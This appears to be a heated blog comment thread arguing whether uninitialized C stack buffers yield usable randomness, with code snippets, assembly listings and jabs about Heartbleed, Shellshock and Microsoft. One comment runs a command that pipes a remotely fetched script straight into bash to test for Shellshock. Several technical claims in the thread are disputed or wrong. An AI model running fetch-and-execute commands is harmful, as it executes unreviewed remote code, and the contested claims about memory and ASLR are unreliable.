    DrLoser, think about this: if in 2003 the memory errors had been forced to be fixed up, the hartbleed bug would not have been in existence by the time it was exploited. Yes, the 2003 Valgrind logs in the OpenSSL bug list include the hartbleed bug location. Hartbleed is a direct result of neglect and of a project lead being an idiot and believing a myth.
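
    For anyone who has not used it, this is the class of bug Valgrind flags, boiled down to a sketch (mine, not OpenSSL's actual code):

    #include <stdio.h>

    int main(void) {
        unsigned int buf[100], result = 0; /* never initialized */
        int i;

        for (i = 0; i < 100; i++)
            result ^= buf[i];
        /* Compile with gcc -g and run under "valgrind ./a.out":
         * memcheck flags the use of uninitialised values here. */
        printf("test %x\n", result);
        return 0;
    }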

    Hartbleed is a direct result of the myth that undefined items can be safe to use. There are equal bugs in Windows turning up all the time that trace to the same issue.

    TMR states their job is to nuke myths of the FOSS world. Here is one; go get them. It's a huge myth, with lots of high-level people needing skinning. I think somehow it's out of your league.

  74. oiaohm wrote, “Take into account on how many are pointers and how this effects their random value”

    A lot of memory in a digital computer is full of characters of the alphabet, zeroes, ones, and instructions. It's interesting that in a programme on a machine with hundreds of possible op-codes, just a handful may account for the majority. I once worked on some source code that had been damaged by a hardware error: every "A" was changed to an "I", and I had to go changing LIC and DIC back to LAC and DAC, the two most common instructions on the PDP series of machines, load and deposit accumulator… Further, in a snapshot of RAM there's no guarantee the sample won't be a large patch of constants and text in some software using a tiny portion of the bandwidth of a good random-number generator.

  75. oiaohm says:

    DrLoser, by the way, run the maths on the 150 unique values. Take into account how many are pointers and how that affects their random value: pointers into the stack and libraries share their upper bits, so only the low dozen or so bits vary, giving something like 150 × 2^12 ≈ 600,000 possible states. The result is that, instead of 4 billion states, TEG's example has under 1 million. Sorry, TEG's example is broken in so many ways it's not funny. The Linux kernel's random number generator might not be the best, but it's way better than a random number generator based on undefined buffers, on systems that secure memory between processes.

    The problem is that a 1-million entropy level is enough to fool most people that something is a random number generator. As soon as someone starts suggesting unallocated memory has a place in a random number generator, you know you are in trouble; there are many other sources that are so much better. Really, DrLoser, you should have been the one to drop the brickbat on TEG for being stupid, but you are too busy looking at me to take care of your own members.

  76. oiaohm says:

    DrLoser
    It’s completely off-topic from TEG’s successful demonstration that you don’t have a clue what you’re talking about, oiaohm, but it does demonstrate that you can get a perfectly serviceable amount of entropy out of a random Linux memory page.
    No. TEG did not demo that you could use a random Linux memory page; you are completely wrong about what TEG's code was doing.

    http://mrpogson.com/2014/10/31/more-failures-of-the-wintel-monopoly/#comment-216103
    This here is the critical bug, DrLoser. It is just accessing a different random page, the page following the one TEG's code was accessing. The result is always 0.

    TEG was only accessing one particular page, and accessing that one particular page appeared to give random results: a page that contains pointers that are randomized. For pointers to be randomized, address-space randomization has to be on. Turn that off and it breaks.

    To be correct, TEG just came up with an extremely long-winded way of accessing the Linux random number generator, with reduced entropy.

    DrLoser, are you aware that .so and .a files under Linux have constructors? TEG said I could use whatever flag I liked to jam it. -l[right library] jammed it, because the library constructor nicked the first 4 KB, so the memory in buf is now zeroed. Libraries get the first chomp at memory, not your application, and the order in which libraries get their chop at the memory is based on where they are in the build command.

    DrLoser, basically, if I put the effort in and link the right library, I can make stock Debian jam Exploit Guy's code. A sketch of the mechanism is below.
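
    Here is a minimal sketch (mine, using GCC's constructor attribute as a stand-in for a real library's init routine; whether buf actually lands in the scrubbed region depends on the compiler and stack layout):

    #include <stdio.h>

    /* Stand-in for a library constructor: runs before main() and scrubs a
     * chunk of stack that main()'s "undefined" buffer may later sit on. */
    __attribute__((constructor))
    static void early_init(void) {
        char scratch[4096];
        volatile char *p = scratch;
        int j;
        for (j = 0; j < 4096; j++)
            p[j] = 0; /* volatile writes, so the compiler cannot elide the scrub */
    }

    int main(void) {
        unsigned int buf[100], result = 0; /* deliberately uninitialized */
        int i;
        for (i = 0; i < 100; i++)
            result ^= buf[i];
        /* Whether this prints 0 depends entirely on what ran before main(). */
        printf("test %x\n", result);
        return 0;
    }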

    DrLoser, also, get it right: I did not set 100 because I thought that was suitable to display the problem. I said 100 because it was simple for humans to compare. Robert made that error, not me.

    DrLoser, TEG just demoed that he does not know how to code a random number generator and has a complete lack of understanding of what can happen.

  77. DrLoser wrote, “Actually, Robert, there’s only one “Grave functionality bug.”
    And one “Important bugs; Confirmed.”
    And three “Important bugs; More information needed.”
    And one “Normal bugs: Confirmed.””

    I don't know where you're looking, but the list is much longer:
    “Outstanding bugs — Grave functionality bugs; More information needed (1 bug)
    Outstanding bugs — Important bugs; Patch Available (1 bug)
    Outstanding bugs — Important bugs; Confirmed (1 bug)
    Outstanding bugs — Important bugs; Unclassified (18 bugs)
    Outstanding bugs — Important bugs; More information needed (3 bugs)
    Outstanding bugs — Normal bugs; Patch Available (3 bugs)
    Outstanding bugs — Normal bugs; Confirmed (1 bug)
    Outstanding bugs — Normal bugs; Unclassified (82 bugs)
    Outstanding bugs — Normal bugs; More information needed (10 bugs)
    Outstanding bugs — Normal bugs; Will Not Fix (1 bug)
    Outstanding bugs — Minor bugs; Patch Available (2 bugs)
    Outstanding bugs — Minor bugs; Unclassified (20 bugs)
    Outstanding bugs — Minor bugs; Will Not Fix (1 bug)
    Outstanding bugs — Wishlist items; Patch Available (2 bugs)
    Outstanding bugs — Wishlist items; Unclassified (25 bugs)
    Outstanding bugs — Wishlist items; More information needed (1 bug)
    Outstanding bugs — Wishlist items; Will Not Fix (3 bugs)
    Forwarded bugs — Important bugs (1 bug)
    Forwarded bugs — Normal bugs (5 bugs)
    Forwarded bugs — Wishlist items (2 bugs)
    Pending Upload bugs — Wishlist items (1 bug)
    Resolved bugs — Critical bugs (1 bug)
    Resolved bugs — Grave functionality bugs (1 bug)”

    If Debian alone has forwarded 8 bug reports, how many have Ubuntu, Red Hat et al. forwarded?

    This one's about runlevels: Debian is normally in runlevel 2 but systemd uses 5, like RedHat…
    So's this one.

  78. dougman says:

    Bing-A-Ling, quit trying to misdirect the conversation.

    However, since you brought up credit cards, oh what was the major flaw that Home Depot just suffered? They blamed M$ Windows and reliance on Win-Dohs is going to cost them hundreds of millions.

    At least M$ can not be sued or held responsible, as Home Depot did agree to the EULA when they used M$ software. Fair wouldn’t you say?

  79. DrLoser says:

    They both look like rubbish to me. BTW, what’s the licence? Open Source does not necessarily mean Free Software.

    Both? Well, I admire and share your obstinacy about Java, Robert. It does seem to be reasonably popular in the FLOSS world, however. I understand that Google has even managed to stitch together a mobile Gnu/Linux platform off the back of it.

    Now, the license for Dot Net Everywhere.

    Are you seriously going to tell us that you would embrace the concept if only the license corresponded to your rigorous yet hopelessly ill-defined requirements?

    Because, forgive me, Robert, I doubt that. Tell me I’m wrong on that small point.

  80. DrLoser says:

    Win-Doh trolls make big issues over Linux server malware, but how many consumers actually run servers? I say 1%, perhaps even less.

    You really, seriously, walked into that one, didn’t you, Dougie?

    How many consumers have credit cards?

    Related to which, how many consumers use their credit cards over the Web?

    Just as the first possible Linux security flaw that springs to mind in these circumstances.

  81. dougman says:

    Win-Doh trolls make big issues over Linux server malware, but how many consumers actually run servers? I say 1%, perhaps even less, so for the majority of people it is a non-issue, but in the world of Microsoft what affects the desktop also does the server.

    Linux malware isn’t new, but for one reason or another it never seems to spread far, why is that?

  82. DrLoser wrote, “Finally Linux is about to acquire a proper modern development environment to replace all that ancient Java rubbish.”

    They both look like rubbish to me. BTW, what’s the licence? Open Source does not necessarily mean Free Software.

    This could be good news if it allows applications written for that other OS to be ported easily to GNU/Linux. I don't know of any that are, however. Is PhotoShop?

  83. DrLoser says:

    Speaking of FLOSS loonies working for M$, btw, have y’all checked out the breaking news?

    That’s right. Finally Linux is about to acquire a proper modern development environment to replace all that ancient Java rubbish. All thanks to Microsoft and their unceasing commitment to FLOSS!

    Dot Net FTW!

  84. DrLoser says:

    Heartbleed, ah, the tricky one. You also left out that it is a Win-Dohs problem too, but let's not overlook the facts, eh? Again, this is a communication bug for servers.

    Are there any "facts" to overlook, Dougie? Significantly, despite the clear fact that you tend to go a bit spare and link indiscriminately to sites of dubious relevance … a bit like oiaohm, but thankfully with fewer pretensions to credibility … you missed the chance to link on this one.

    Here, I’ll help you out.

    No guarantee that M$ is not also vulnerable to Heartbleed, of course. You’d be surprised how many FLOSS loonies there are, working for M$.

    But, no. Heartbleed is fairly obviously a Linux security flaw.

  85. DrLoser says:

    Synopsis: if you’re not running a server, then you have nothing to worry about.

    To be strictly accurate, Dougie, a Linux server. But what the heck, I’ll give you that. 40% of the Web Server market goes blooey, no cat dies, old news, wrap fish and chips in it and be done.

    Apart from the fact that an unknown number of miscreants (if I may demean, say, the Russian Mafias with this term) might very well have used ShellShock — and I assume you know, Dougie, what a CVE refers to; there are six by your count — as a long-term investment.

    I’m not for a moment suggesting that any security hole on any OS is immune to this. I’m merely suggesting that ShellShock is a poster child for such things, given the mechanism involved.

  86. dougman says:

    “Because none of us are going to make our work harder by throwing away one environment for another…”

    OLDman, delusional, feeble and narrow-minded: for someone who *supposedly* uses RedHat, you refuse to admit the benefits of Linux. There is nothing to see here, move along!

    LOLz…

    OK, let's investigate his mention of Shellshock and Heartbleed.

    Shellshock is a problem for servers, but eh, one can test for it anyway, for sh1ts and giggles.

    curl https://shellshocker.net/shellshock_test.sh | bash
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100  2627  100  2627    0     0   7197      0 --:--:-- --:--:-- --:--:--  7217
    CVE-2014-6271 (original shellshock): not vulnerable
    CVE-2014-6277 (segfault): not vulnerable
    CVE-2014-6278 (Florian’s patch): not vulnerable
    CVE-2014-7169 (taviso bug): not vulnerable
    CVE-2014-7186 (redir_stack bug): not vulnerable
    CVE-2014-7187 (nested loops off by one): not vulnerable

    Synopsis: if you’re not running a server, then you have nothing to worry about.

    Heartbleed, ah, the tricky one. You also left out that it is a Win-Dohs problem too, but let's not overlook the facts, eh? Again, this is a communication bug for servers.

    Synopsis: if you’re not running a server, then you have nothing to worry about.

    Meanwhile, back to bashing MicroSh1t. The opponents of the M$ monopoly are slowly whittling it down to nothing. Who would have thought that M$ would be selling low-cost products to compete, then giving away major upgrades and software for peanuts? The answer lies in the fact that competition is bypassing Windows and M$ is having to catch up by lowering prices for consumer and business products.

    And look at this:

    http://www.wired.com/2014/11/microsoft-open-sources-net-says-will-run-linux-mac/

    Wow, I bet the anti-FOSS trolls that come here did not see that one!

    Here is another..

    “Not so long ago, Microsoft execs told customers they could count on the company to deliver first and best on Windows. But in the new, platform-neutral Microsoft — where new apps and services increasingly appear on iOS and Android before Windows or Windows phones — why should users bet on Windows?”

    “It’s almost as if Microsoft — which has a history of over-correcting when it makes a wrong turn (see making Windows Phone a consumer platform without enterprise support for years, for just one example) — is so intent on proving it’s not the Windows company any more that it’s leaving Windows users out to dry.”

    http://www.zdnet.com/with-a-new-platform-neutral-microsoft-why-go-windows-7000035720/

    Repeat after me.. SERVICES… SERVICES… SERVICES… SERVICES… SERVICES… SERVICES…

  87. DrLoser wrote, “you and Robert persist in thinking that a tiny arbitrary number like 100 is anything like as useful a sample”.

    I made no comment at all about the merits of 100 v 4095. My comment was about getting stuff off the stack v asking the operating system for memory. Obviously, if you seek data, random or not, more is usually better. Don’t take things out of context like that. It’s rude, abrasive, and often wrong, but I’m sure it’s in the Troll’s Rule-book.

  88. olderman wrote, “none of us are going to make our work harder by throwing away one environment for another”

    That’s not true. Millions are migrating to GNU/Linux one way or another: buying PCs with GNU/Linux or ChromeOS or Android/Linux or installing the software as needed. Of course not everyone will do that but many will because they are fed up with the high cost of Wintel, malware, endless re-re-reboots or BSODS, whatever…

    I was just reading about the City of Toulouse in France. They have a lot of GNU/Linux on servers, FLOSS on desktops and they are considering GNU/Linux on desktops. They did not do that to increase their work load but to get more done with less. Toulouse is quite pragmatic and not FLOSSies at all. They changed their work environment and it did not make more work for them.
    “Software licenses for productivity suites cost Toulouse 1.8 million euro every three years. Migration cost us about 800,000 euro, due partly to some developments. One million euro has actually been saved in the first three years. It is a compelling proof in the actual context of local public finance” So, it paid Toulouse to switch. The French National Police started with OpenOffice.org and then migrated thousands of desktops to GNU/Linux. They saved 40% of the cost of PCs.

  89. DrLoser says:

    1000 is extreme wishful thinking, That Exploit Guy.

    And yet you and Robert persist in thinking that a tiny arbitrary number like 100 is anything like as useful a sample as, say, the default (stock) Linux page size — both bigger and a better choice in any case.

    It’s one or the other, oiaohm. You can’t win on both counts.

    Non-zero is not your only consideration when creating a random number generator source. The constant pattern, where lots of the values in the 4 KB occur in pairs, results in a large percentage of the numbers cancelling themselves out.

    So what? TEG kindly pointed out that he was expecting “less than 1000” nonzero octets. Even a hundred is more than you’re going to see with your own feeble effort. And only paired octets will cancel each other out in an XOR.

    All of which is irrelevant, because TEG’s sample code is not intended to provide a high-quality random number generator, just to disprove your foolish assertion that stock Debian zeros or dead-beefs memory without any such requirement by the programmer.

    If you’re worried about repeated octets cancelling themselves out, btw, may I recommend the following?

    n^32 + n^26 + n^23 + n^22 + n^16 + n^12 + n^11 + n^10 + n^8 + n^7 + n^5 + n^4 + n^2 + n + 1
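
    That is the standard CRC-32 polynomial, by the way. For anyone who wants to try it, a minimal bitwise sketch of mine (reflected form; it is a mixer against paired-value cancellation, not a cryptographic hash):

    #include <stdio.h>

    /* Bitwise CRC-32 (the IEEE polynomial above, reflected as 0xEDB88320). */
    unsigned long crc32_update(unsigned long crc, const unsigned char *p, unsigned n) {
        int k;
        crc = ~crc & 0xFFFFFFFFUL;
        while (n--) {
            crc ^= *p++;
            for (k = 0; k < 8; k++)
                crc = (crc >> 1) ^ (0xEDB88320UL & (0UL - (crc & 1)));
        }
        return ~crc & 0xFFFFFFFFUL;
    }

    int main(void) {
        /* The standard check value: CRC-32 of "123456789" is cbf43926. */
        printf("%08lx\n", crc32_update(0, (const unsigned char *)"123456789", 9));
        return 0;
    }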

    It’s completely off-topic from TEG’s successful demonstration that you don’t have a clue what you’re talking about, oiaohm, but it does demonstrate that you can get a perfectly serviceable amount of entropy out of a random Linux memory page.

    It’s also computationally ridiculously cheap.

  90. dougman wrote, “Microsoft fixes ’19-year-old’ bug with emergency patch”.

    This situation is so extreme yet folks like olderman accept it… Consider these issues:

    • The bug was reported to M$ back in 2014-May, yet it took months to fix something so critical. That’s a symptom of some disarray in M$. Are they short of staff? Does every bug have too many effects? Do they care?
    • There are hundreds of millions of XP-machines out there, all using IE-whatever with this bug available via IE and VBscript. Are we about to see the largest super-computer controlled by bad guys ever?
    • M$ has publicly admitted that they shipped software with zero security back in the Lose ‘9x days. WHY ARE THEY STILL USING THAT CODE?

    I think governments should issue an order for a safety recall of all M$’s products. Now.

  91. olderman says:

    “19 years??..LOLz”

    Laugh all you want Dougie, It will get fixed, just like shellshock and heartbleed get fixed, and we all go on from there.

    Because none of us are going to make our work harder by throwing away one environment for another, especially one that has its own warts and issues for many.

  92. dougman says:

    19 years??..LOLz

    Microsoft fixes ’19-year-old’ bug with emergency patch

    http://www.bbc.com/news/technology-30019976

  93. oiaohm says:

    That Exploit Guy
    Even with the length of buf set to 4095, there's a good chance you'll get less than 1000 non-zero values. Next time you arbitrarily change something in a piece of code, try and understand why it is the way it is first.
    Just because a value is non-zero does not mean it is doing anything useful for the result.
    On Linux there are about 150 unique values in the first 4 KB, demoed by the following code, which shows the unique-value count. Yes, it is always 150 or fewer unique values, and that is without allowing for the constant values that should be filtered out.

    1000 is extreme wishful thinking, That Exploit Guy. Non-zero is not your only consideration when creating a random number generator source. The constant pattern, where lots of the values in the 4 KB occur in pairs, results in a large percentage of the numbers cancelling themselves out. Randomness from the unique values is far more random than your first code's, yet it's still not good.
    #include <stdio.h>
    #include <stdlib.h> /* qsort */

    /* comparison function for qsort over unsigned ints */
    int cmpfunc (const void *a, const void *b)
    {
        unsigned int x, y;
        x = *(const unsigned int *)a;
        y = *(const unsigned int *)b;
        if (x > y)
            return 1;
        return (x < y) ? -1 : 0;
    }

    int main() {
        int i;
        /* unsigned int buffer[0xFFF];  (declare this first to jam the result;
           see the other example below) */
        unsigned int buf[0xFFF], result = 0; /* deliberately uninitialized */
        unsigned int n = 0;                  /* count of unique values */

        /* sort the uninitialized buffer so duplicates sit side by side */
        qsort(buf, 0xFFF, sizeof(unsigned int), cmpfunc);
        result ^= buf[0];
        for (i = 1; i < 0xFFF; i++)
        {
            if (buf[i-1] != buf[i]) {
                n++;
                printf("randomlist %u %i,%x\n", n, i, buf[i]);
                result ^= buf[i];
            }
        }

        printf("unique %u, xor %x\n", n, result);
        return 0;
    }

    You are looking at the first 4 KB: well under 150 random numbers end up being used if you XOR the 4 KB. Remember, applying the same number twice in an XOR operation is a no-op, so yep, your code, Exploit Guy, threw away a good percentage of the 150. Really, my code showing 150 is being optimistic in the extreme. You never filtered the buffer, Exploit Guy.

    There are reasons why I say you cannot write a random number generator to save your ass, Exploit Guy. A proper random generator from a buffer is not just an XOR; just an XOR could end up throwing out all the randomness and settling on a locked value far more simply.

    You want 1000 source random numbers? Use the OS random number generator, which draws on user input and other generation methods.

  94. oiaohm says:

    That also has the effect of reducing the entropy collected by buf.
    To be correct, at size 100 it is always broken; there are always some stuck bits under Linux.
    ASLR concerns addresses in the virtual memory space. It has fundamentally nothing to do with junk data collected from physical memory.
    Except the buffer has not come from random physical memory. The buffer comes from memory the application already allocated, by operations performed before main runs. The random values in there are in fact pointers and the remains of data structures the program used earlier.

    Exploit Guy, it's worse than "1000 non-zero values". Remember, you are doing XOR: every pair of identical values results in a no-op. Yes, you might have 1000 non-zero values that are randomized, but since they could just happen to all be in pairs, the result is a jammed random source. Nothing in your code example is checking for the possibility of being jammed; the toy below shows the cancellation.
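
    A toy of mine (not TEG's code): fill the buffer with values that happen to occur in pairs, and the XOR fold collapses to zero, however random the values look:

    #include <stdio.h>
    #include <stdlib.h>

    int main(void) {
        unsigned int buf[100], result = 0;
        int i;
        srand(12345);
        for (i = 0; i < 100; i += 2)
            buf[i] = buf[i + 1] = (unsigned int)rand(); /* 50 values, each twice */
        for (i = 0; i < 100; i++)
            result ^= buf[i];
        printf("test %x\n", result); /* always prints 0 */
        return 0;
    }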

    Deaf Spy, 4095 is coming from somewhere, but it's not what you think.
    #include <stdio.h>

    int main() {
        int i;
        unsigned int buffer[0xFFF]; /* deliberate mistake: a second buffer declared first */
        unsigned int buf[0xFFF], result = 0;
        buffer[0] = 0; /* touch it so the compiler keeps it */
        for (i = 0; i < 100; i++)
        {
            printf("randomlist %i,%x\n", i, buf[i]);
            result ^= buf[i];
        }

        printf("test %x\n", result);
        return 0;
    }
    Notice that in my code example here the programmer made an error and declared a second buffer ahead of buf; the result is completely broken and stuck on 0. This example is always zero on Debian GNU/Linux and every other Linux. It is a direct demonstration of the problem: as the program gets more complex, this kind of "random" is more likely to be screwed up.

    The 4 KB is used in application setup by the crt0.o from the linker. There is absolutely no point using a value larger than 4 KB, as every other part of the stack is all zeros. The only reason there is any random data at all is that the start-up code in crt0 did not clean up after itself before main ran, address-space randomization is on, and the application did not run in an exact order. Yes, the int i that I copied from Exploit Guy's code is in the wrong place, because it has destroyed one possible random value; the init of i should have been in the for loop to give the most possible random values.

    The 4 KB is coming from the crt0 that was linked into the executable binary. A hardened version of crt0 will clean up after itself; then, at the start of main, everything in the stack will be zeros, or 4 KB of 0xdeadbeef followed by all zeros, depending on how crt0 was configured to clean up after itself.

    Random from a buffer depends on behavior outside your control. It is safer to call the OS's proper random functions.

    This is why Exploit Guy's code only appears to work. Using a buffer for random on Linux is a very quick way to run into a lot of trouble. Remember, gcc has more than one crt0, same with LLVM, so Exploit Guy is betting that the compiler will play along. Not future-safe code, Exploit Guy, as linkers are free to change how crt0 operates at any time.

    That Exploit Guy, you claim to understand exploits. I thought the first 100 values and their layout would trigger you to wake up to what your so-called random source was. Yes, it is reading the leftovers of crt0. Yes, there are hardened forms of crt0 that don't leave this behind. One minor coder error, declaring something in the wrong place, and it also jams. There are no comments in Exploit Guy's code to say "don't declare anything before the buffer".

    Random from an undefined buffer is an extremely bad idea. On Linux it almost always has a calculable, defined value shape, or is filled with zeros/0xdeadbeef (so it does not work at all).

    Notice that Exploit Guy's code is so platform-dependent it's not funny. I always hate coders who say "hey, this works, it's fine" when it comes to security. Those are the ones who don't do the homework to see what is going on under the hood.

  95. dougman wrote, of M$’s patching, “increasing.”

    That’s not necessarily a bad thing. It could be reasonable in proportion to the size of the codebase and number of versions supported. Let’s see: XP, 2003, 2008, 2010, Vista, Vista 2, “8” and “8.1” and “10” all being supported simultaneously. M$ is literally forking itself. Then there’s the code-bloat… and software designed for the unique and new gadgets. At the same time M$ is cutting staff. I think they are spreading themselves thinly.

  96. dougman says:

    http://www.tomsguide.com/us/microsoft-biggest-patch-tuesday,news-19893.html

    It seems to me, that in reality the amount of overall patches for Windows, is increasing.

  97. That Exploit Guy says:

    This is me posting from my brand-new Windows 10 VM.

    @Dead Spy

    Sorry to step in, gentlemen, but I can’t resist.

    Thanks for nothing.

    @Olderman

    how about recompiling with TEG’s original 4095?

    Thanks also for absolutely nothing.

    @Robert Pogson

    This is TEG essentially being unfair.

    No, and you know I am not. Of course, an argument between Peter Dolding and the “trolls” just cannot be complete without you lamely and stubbornly defending him, can it?

    100 and 4095 are both arbitrary values, one arbitrarily larger than the other.

    And I have already given my explanation as to why I have chosen the larger value, and it is entirely your conscious decision to completely ignore that explanation.

    There’s absolutely nothing wrong with oiaohm’s choice. He could have argued it should be larger.

    He could have, but he did not.

    Rather than accusing me of being unfair, why not spend a bit of your sweet time asking Dolding why he thought it was a good idea to cut down the size of buf to 100 instead of using a spreadsheet to tabulate the value of each element like everyone else would?

    What would your argument have been then, that he was wasteful?

    Again, it is hardly my fault that you have chosen to completely ignore what I have said about the size of buf.

    That’s also unfair. ASLR affects the mapping from virtual to physical space.

    No. This is not to mention the Wikipedia article you have cited does not justify even one bit of your above argument.

    By the way, why do I have a feeling you are just going to fall silent on this subject matter and instead let Dolding fluff a giant wall of text, which you will neither acknowledge nor deny. After all, isn’t that why you are keeping him around – to tell lies about things (especially on Microsoft-related subjects) while maintaining a layer of deniability?

    This is not oiaohm’s code. It’s TEG’s.

    If you want Dolding's code, it's right here in this post. Was your selective blindness acting up again, eh?

    Popping something off the stack by the compiler is not the same as making a system call for storage.

    Irrelevant, unless, of course, you are suggesting that Dolding’s code somehow makes “a system call for storage” for buf, which it clearly doesn’t.

    Either 100 or 4095 units of storage may come from a heap that has or has not been sliced and diced by other software/hardware and the code in question has nothing to do with how that storage was allocated.

    I like how this completely contradicts the preceding statement by stating outright that whether the memory is dynamically allocated has nothing to do with the entropy within.

    So, now what? Should we give a toss about whether there is “a system call for storage” in the code or not? Make up your mind.

    It has nothing to do with the size/quality of the stack/heap. It has nothing to do with what libraries will be linked or what OS will run the code.

    So are you saying that Dolding is wrong on the issue regarding 0x00000000/0xdeadbeef/glibc?

  98. Hey! The trolls are kind of quiet today. It’s Patch Tuesday, and I suppose they are busy plugging holes in their IT.

  99. olderman wrote, “how about recompiling with TEG’s original 4095?”

    1:junk.c **** #include "stdio.h"
    2:junk.c **** int main() {
    15 .loc 1 2 0
    16 .cfi_startproc
    17 0000 55 pushq %rbp
    18 .cfi_def_cfa_offset 16
    19 .cfi_offset 6, -16
    20 0001 4889E5 movq %rsp, %rbp
    21 .cfi_def_cfa_register 6
    22 0004 4881EC10 subq $16400, %rsp

    Just a different constant in line 22 of the listing: 4095 unsigned ints need 16380 bytes, which with the other locals and alignment becomes the 16400 reserved on the stack, versus 416 for the 100-element version.

  100. olderman says:

    “There’s no malloc or such here. It’s all from the stack.”

    how about recompiling with TEG’s original 4095?

  101. Deaf Spy wrote, “ASLR affects only the virtual addresses.”

    The virtual addresses are mapped to physical addresses so changing the virtual address changes the physical address. Don’t be so literal. Combined with tunnel-vision, it’s a waste of our time.

    Deaf Spy wrote, “This buffer is not on the stack.”

    1:junk.c **** #include "stdio.h"
    2:junk.c **** int main() {
    15 .loc 1 2 0
    16 .cfi_startproc
    17 0000 55 pushq %rbp
    18 .cfi_def_cfa_offset 16
    19 .cfi_offset 6, -16
    20 0001 4889E5 movq %rsp, %rbp
    21 .cfi_def_cfa_register 6
    22 0004 4881ECA0 subq $416, %rsp
    22 010000
    3:junk.c **** int i;
    4:junk.c **** unsigned int buf[100], result = 0;
    23 .loc 1 4 0
    24 000b C745F800 movl $0, -8(%rbp)
    24 000000
    5:junk.c **** for (i = 0; i < 100; i++)
    25 .loc 1 5 0
    26 0012 C745FC00 movl $0, -4(%rbp)
    26 000000
    27 0019 EB33 jmp .L2
    28

    There's no malloc or such here. It's all from the stack.

  102. Deaf Spy says:

    Sorry to step in, gentlemen, but I can’t resist.

    100 and 4095 are both arbitrary values, one arbitrarily larger than the other.
    No, 4095 is absolutely not arbitrary. Hints: page size, data alignment, physical memory allocation.

    ASLR affects the mapping from virtual to physical space.
    No, it absolutely doesn’t. ASLR affects only the virtual addresses. Period. How virtual addresses are mapped to physical space is a completely different matter, and is handled by the MM of the OS, and ASLR has nothing to do with it.
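
    Easy enough to see for yourself; a minimal sketch (mine) that prints virtual addresses across runs. With ASLR on, the stack and heap addresses move between runs; disable it (e.g. setarch `uname -m` -R ./a.out) and they repeat. Either way, the kernel's MM decides the physical pages:

    #include <stdio.h>
    #include <stdlib.h>

    int main(void) {
        int local;
        void *heap = malloc(16);
        /* Stack and heap virtual addresses change between runs under ASLR.
         * The code address moves only if built as PIE (gcc -fPIE -pie). */
        printf("code  %p\nstack %p\nheap  %p\n",
               (void *)main, (void *)&local, heap);
        free(heap);
        return 0;
    }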

    This is not oiaohm’s code. It’s TEG’s.
    We're talking about oiaohm's claims here, Pogson. He brought up the myth about 0xdeadbeef and 0x00000000. Neither the OS in question nor glibc auto-initializes data buffers with these values.

    Popping something off the stack by the compiler
    This buffer is not on the stack.

    It has nothing to do with the size/quality of the stack/heap.
    It has, it has, see above.

    Pogson, are you sure you pick your allies wisely?

    TEG wrote, "Even with the length of buf set to 4095, there's a good chance you'll get less than 1000 non-zero values. Next time you arbitrarily change something in a piece of code, try and understand why it is the way it is first."

    This is TEG essentially being unfair. 100 and 4095 are both arbitrary values, one arbitrarily larger than the other. There’s absolutely nothing wrong with oiaohm’s choice. He could have argued it should be larger. What would your argument have been then, that he was wasteful?

    Similarly, TEG wrote, “ASLR concerns addresses in the virtual memory space. It has fundamentally nothing to do with junk data collected from physical memory.”

    That’s also unfair. ASLR affects the mapping from virtual to physical space. A random mapping is still a mapping. A contiguous buffer will likely be contiguous in physical space as well.

    Further, TEG wrote, “there was no 0xdeadbeef, no 0x00000000, or any funny business that you claimed the Linux kernel/GCC/glibc would do.”

    This is not oiaohm's code. It's TEG's. Popping something off the stack by the compiler is not the same as making a system call for storage. Either 100 or 4095 units of storage may come from a heap that has or has not been sliced and diced by other software/hardware and the code in question has nothing to do with how that storage was allocated. It has nothing to do with the size/quality of the stack/heap. It has nothing to do with what libraries will be linked or what OS will run the code.

  104. That Exploit Guy says:

    Yes, I have reduced the buffer size, but that is for the practical reason that 100 is simpler for a human to compare by eye.

    That also has the effect of reducing the entropy collected by buf.

    Besides, if you want to “compare by eye” the values in buf, use a spreadsheet.

    That Exploit Guy, run this form of the program. This version is a true check of the random data source.

    No, that’s just printing out values from buf, with a sample size of 100.

    Notice how many of the buf[i] values, without me tweaking anything, are basically constant every time the program is run.

    Even with the length of buf set to 4095, there's a good chance you'll get less than 1000 non-zero values. Next time you arbitrarily change something in a piece of code, try and understand why it is the way it is first.

    The reality is your random number generator is generating from addresses the Linux kernel's address randomization created.

    ASLR concerns addresses in the virtual memory space. It has fundamentally nothing to do with junk data collected from physical memory.

    That Exploit Guy, you have not checked your random source to see what it is.

    I have. How do you think I came up with 4095 as the size for buf?

    Libraries and applications are a lot more complex. This brings hell. The more complex the code, the more chance the compiler will optimize your undefined array source to a state where it is completely jammed to a defined value.

    Again, you have completely failed to show any evidence of why this can be the case.

    Sure, it is entirely possible that, seeing buf as being uninitialised, some compilers may attempt to optimise out result ^= buf[i] and cause result to always remain 0, but I doubt this is the case for GCC.

    For the sake of thoroughness, I have already tried the code with a non-GCC compiler before posting it here. No such optimisation was observed, either.

    Also, there was no 0xdeadbeef, no 0x00000000, or any funny business that you claimed the Linux kernel/GCC/glibc would do.

    You, sir, are truly full of crap, aren’t you?

  105. DrLoser quoth, “Dulce et decorum est…”

    There’s nothing good coming from industrial grade slaughter. My father was involved in WWII which on the military front was much more civilized than WWI and he had nightmares for 15 years afterwards. The foot-soldiers had it worse in WWI but civilians paid a much higher price in WWII. Somehow the gene-pool keeps producing folks who don’t learn from history. e.g. Iran (?), Israel (?), N. Korea, India, Pakistan, Russia, China, USA, UK, FR, … all possessing nukes. e.g. USA spending more on “offence” than anyone else yet not being able to afford universal education/medicare. I don’t celebrate any military no matter how much courage/skill/technology they demonstrate. It’s all a waste until it becomes necessary.

  106. oiaohm wrote, “This version is a true check of the random data source. Notice how many values of buf[i], without me tweaking anything, are basically constant every time the program is run. Turn off address randomization and the result can show no variation at all.”

    That’s pretty weak. In fact, in a multi-user/multi-process environment, running an application multiple times can give different garbage in an uninitialized buffer from time to time. Spies count on that to skim through the garbage in RAM/storage. They can also spawn processes to gradually use up RAM so stuff loads over a wide area. No method will zero the risks. All we can do is minimize them by various techniques. I like to deliberately initialize stuff in the code. We should also wipe data before releasing storage/RAM. Pascal and other compilers warn about uninitialized variables. Operating systems can do a lot of good with /dev/zero, /dev/random, etc. but folks who are really serious will use a hardware random number generator, using something static/hissy/noisy and digitizing it. It is expensive, however, to get the bandwidth/throughput needed in larger systems, so compromises must be made. Combining multiple pseudo-random sources is about the best we can do. In the old days a noisy diode was good enough but it was hard to get even 1 MB/s of junk. Modern PCs may need a lot more if you are going to wipe buffers with anything but zeros or ones. Then there’s the residue of data in storage…
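
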